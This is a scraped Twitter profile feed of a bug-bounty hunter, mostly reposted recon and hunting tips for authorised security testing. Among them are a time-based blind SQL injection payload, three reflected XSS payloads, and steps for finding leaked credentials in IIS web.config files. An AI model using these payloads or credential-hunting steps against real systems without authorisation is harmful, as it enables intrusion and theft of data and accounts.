Pratik Dabhi(@impratikdabhi) 's Twitter Profileg
Pratik Dabhi

@impratikdabhi

👨🏻‍💻Ethical Hacker 🐞Bug Hunter | Penetration tester 👨🏻‍💻Security Consultant at @Deloitte ☢️ Bugcrowd Top 250 | SRT |YouTuber (20k+ Subs)

ID:2902452271

linkhttps://www.pratikdabhi.com/ calendar_today17-11-2014 06:16:15

3,2K Tweets

17,3K Followers

993 Following

0x50d(@Osaqii) 's Twitter Profile Photo

Another P1 using Godfather Orwa 🇯🇴 tip:
- Found default IIS BLUE page
- Run tool shortscan for iis
- Found endpoint like : target~.zip
- run fuzz and found zip file with a web.config file leaking creds .Leads to Admin dashboard takeover.

Another P1 using @GodfatherOrwa tip: - Found default IIS BLUE page - Run tool shortscan for iis - Found endpoint like : target~.zip - run fuzz and found zip file with a web.config file leaking creds .Leads to Admin dashboard takeover. #bugbountytip
account_circle
Ahsan Khan(@hunter0x7) 's Twitter Profile Photo

Update no 3: Reported 15 submissions (total).

Critical one:

Used Js Miner & twitter.com/h4x0r_dz/statu… for finding sen* info in JS files.

Found a JS file disclosing access token without any endpoint.

(1/3)

account_circle
Ninad Mishra(@NinadMishra5) 's Twitter Profile Photo

Discover everything linked to a web address with this OSINT tool! It uncovers domains, subdomains, directories, and files.

github.com/caio-ishikawa/…

account_circle
Root Moksha(@RootMoksha) 's Twitter Profile Photo

Using Nuclei to identify hostnames associated with an ASN using the PTR fingerprinting template!

echo <ASN> | nuclei -id ptr-fingerprint

Use this to help you map a target's network structure and identify potential targets for further testing.

By:haksec.io

Using Nuclei to identify hostnames associated with an ASN using the PTR fingerprinting template! echo <ASN> | nuclei -id ptr-fingerprint Use this to help you map a target's network structure and identify potential targets for further testing. By:@haksecio #bugbountytips
account_circle
Pratik Dabhi(@impratikdabhi) 's Twitter Profile Photo

Listening to this brought tears to my eyes, especially when you sang chandrachooda shiva shankara parvati'the second time. I could feel your deep devotion in every single moment of this clip. Your voice is truly a gift from the divine.

Har Har mahadev🕉️

youtu.be/l8pN_11Ilrc?si…

account_circle
Ninad Mishra(@NinadMishra5) 's Twitter Profile Photo

Unlocking the power of Google dorks with a single script. Search for potentially sensitive files across multiple platforms effortlessly.

github.com/DanMcInerney/f…

account_circle
Root Moksha(@RootMoksha) 's Twitter Profile Photo

Nuclei template that 'Analyse' js files for bug bounty hunters :
- Extract Tokens.
- Extract endpoints.
- Extract URLs.
- Extract Variables names.
(All in one)
github.com/ayadim/Nuclei-…
By:Ayadim

tips

Nuclei template that 'Analyse' js files for bug bounty hunters : - Extract Tokens. - Extract endpoints. - Extract URLs. - Extract Variables names. (All in one) github.com/ayadim/Nuclei-… By:@ayadim_ #bugbountytips #bugbounty
account_circle
Godfather Orwa 🇯🇴(@GodfatherOrwa) 's Twitter Profile Photo

Intigriti It’s a (internal) logon portal
then its should be use for employees, creating account in this panel should be not allowed , so first thing I will try create account and reported 😬
&
SQL injection
Post RXSS
Looking for api calls to see if I can get PII
Playing in Response
Etc…

account_circle
Vipin Panchal(@dirtycoder0124) 's Twitter Profile Photo

s
The following script finds HTML forms in the list of URLs. It helps me a lot to find forms for Blind XSS.
github.com/dirtycoder0124…
Use:
- python3 formfinder.py endpoints.txt

#bugbountytips #bugbountytip #blindxss The following script finds HTML forms in the list of URLs. It helps me a lot to find forms for Blind XSS. github.com/dirtycoder0124… Use: - python3 formfinder.py endpoints.txt
account_circle
HackTube5(@HackTube5) 's Twitter Profile Photo

Recon Tip 2:
Use logsensor to find login pages from subdomain file command: logsensor -f subdomain.txt results will be saved in a file.
Now open one by one login page crawl every url and find login , forgot password page and register or signup page

account_circle
Godfather Orwa 🇯🇴(@GodfatherOrwa) 's Twitter Profile Photo

I earned $5,000 with Abdullah Nawaf (HackerX007)🇯🇴 for submission on @bugcrowd

For 0Day SQLI in
(app extension)
payload was

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+''+(select(0)from(select(sleep(6)))v)+'*/

✌️

account_circle
Root Moksha(@RootMoksha) 's Twitter Profile Photo

Top 3 RXSS payloads by Otterly

`'';//><img/src=x onError='${x};alert(`1`);'>

`'';//><Img Src=a OnError=location=src>

`'';//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob('WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d'))>

tips

account_circle
Emad Shanab - أبو عبد الله(@Alra3ees) 's Twitter Profile Photo

My Recon Methodology (ep 1). Recon is the process by which you… | by Muhammad Mater | Mar, 2024 | Medium realm3ter.medium.com/my-recon-metho…

account_circle